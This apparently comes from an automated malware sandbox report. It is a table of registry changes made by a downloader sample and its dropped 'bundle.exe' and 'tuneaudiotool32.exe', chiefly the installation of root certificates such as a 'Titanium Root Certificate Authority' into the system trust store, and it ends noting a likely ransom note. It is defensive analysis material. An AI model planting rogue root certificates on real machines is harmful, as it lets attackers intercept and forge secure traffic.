| Set value (data) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0c00000050000000a66a63283d95d211b5d600c04fd918d00b0000007800000030f125b7ef471a10a5f102608c9eebac0e00000078000000 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\bundle.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 140000000100000014000000f352eacf816860c1097c4b852f4332dd93eb5d4f0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b0640f000000010000002000000020d814fd5fc477ce74425e441d8f5b48d38db6f1dd119441bc35777689bd094c20000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\TuneAudioTool 2012.3.8200\tuneaudiotool32.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 190000000100000010000000dbd91ea86008fd8536f2b37529666c7b0f000000010000002000000020d814fd5fc477ce74425e441d8f5b48d38db6f1dd119441bc35777689bd094c030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b0640200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000000b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f0072006900740079000000140000000100000014000000f352eacf816860c1097c4b852f4332dd93eb5d4f20000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\TuneAudioTool 2012.3.8200\tuneaudiotool32.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0f000000010000002000000020d814fd5fc477ce74425e441d8f5b48d38db6f1dd119441bc35777689bd094c030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b0640200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e003000000000000b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f007200690074007900000020000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\TuneAudioTool 2012.3.8200\tuneaudiotool32.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\4363463463464363463463463.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 | C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\4363463463464363463463463\Files\bundle.exe | N/A |
Opens file in notepad (likely ransom note)
